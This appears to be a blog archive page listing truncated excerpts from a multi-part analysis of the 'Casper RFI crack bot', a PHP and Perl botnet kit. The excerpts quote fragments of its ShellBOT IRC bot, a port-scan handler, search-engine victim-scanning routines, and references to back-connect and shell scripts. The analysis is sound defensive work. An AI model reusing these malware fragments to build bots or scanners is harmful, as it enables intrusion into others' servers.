Casper RFI crack bot – Part 7
At first I was thinking that these might be encrypted, but that did not turn out to be the case. The first one we found was back_connect_pl....
Casper RFI crack bot – Part 8
We have one more to decode, $shell_data $shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"]; if( $visitcount == "") { $visitcount = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web =...
Casper RFI crack bot – Part 9
So it looks like sh.txt is all about shell access, wow what a surprise! The next item is def.txt. There is not a whole lot in there besides the defacement message, so we are going to move on. The next...
Casper RFI crack bot – Part 10
The next on the list is $filebotphp = "bot.txt"; This looks pretty specific to the irc bot, but there is something encoded again just like in the other scripts. $dc_source =...
Casper RFI crack bot – Part 11
Ok we have a couple more to go through. Next is; $filebotperl = "iso.txt"; I love comments, at least we don’t have to guess what this is for. #!/usr/bin/perl # # ShellBOT by: devil__ # Greetz: Puna,...
Casper RFI crack bot – Part 12
So what is going on next, my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''}));...
Casper RFI crack bot – Part 13
There are a few more things that are worth looking at. if ($funcarg =~ /^portscan (.*)/) { my $hostip="$1"; my...
Casper RFI crack bot – Part 14
One more script is listed at the top of the main one. $filebotscan = "scan.txt"; It’s full of all sorts of stuff, but nothing really caught my attention until I reached this. ##[ GOOGLE ]## sub se_google { my...
Casper RFI crack bot – Part 15
What this appears to be looking for is more machines to exploit, big surprise! I followed it back for a bit and this is what I ended up with. sub se_yahoo { my ($chan,$key,$nf) = @_; sub s_engine { my...
Casper RFI crack bot – Part 16 – Last Part
So looking over all of the scripts what do we have? What is in use here is a collection of scripts by varying authors from multiple nationalities in different languages. This in a best case scenario...